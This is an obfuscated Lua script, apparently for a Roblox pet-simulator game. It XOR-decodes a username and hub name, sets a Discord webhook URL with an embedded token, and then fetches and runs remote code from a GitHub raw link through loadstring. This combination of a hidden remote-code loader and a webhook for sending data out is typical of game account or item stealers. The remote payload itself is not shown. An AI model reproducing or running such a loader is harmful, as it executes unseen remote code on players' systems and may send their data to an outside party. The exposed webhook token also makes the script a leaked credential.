--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + ((v11-1)% #v9) ,1 + ((v11-1)% #v9) + 1 )))%256 ));end return v5(v10);end _G.Username(v7("\63\199\194\215\42\232\156\200\26\194\208","\126\177\163\187\69\134\219\167"));_G.HubName(v7("\200\17\236\14\224\188\16\238\11\232\188\16\238\24\236\204\23","\156\67\173\74\165"));_G.WebhookUrl("https://discord.com/api/webhooks/1111268428246958090/r0n7uTZEsJG7Tz6vDAMM7xWERhlwdY2skqYBHdhOsLzAMbloc4gfPhAdIkkYG0D1iZnK");loadstring(game:HttpGet("https://raw.githubusercontent.com/Avalonssz/Scripts/main/PetSim",true))();
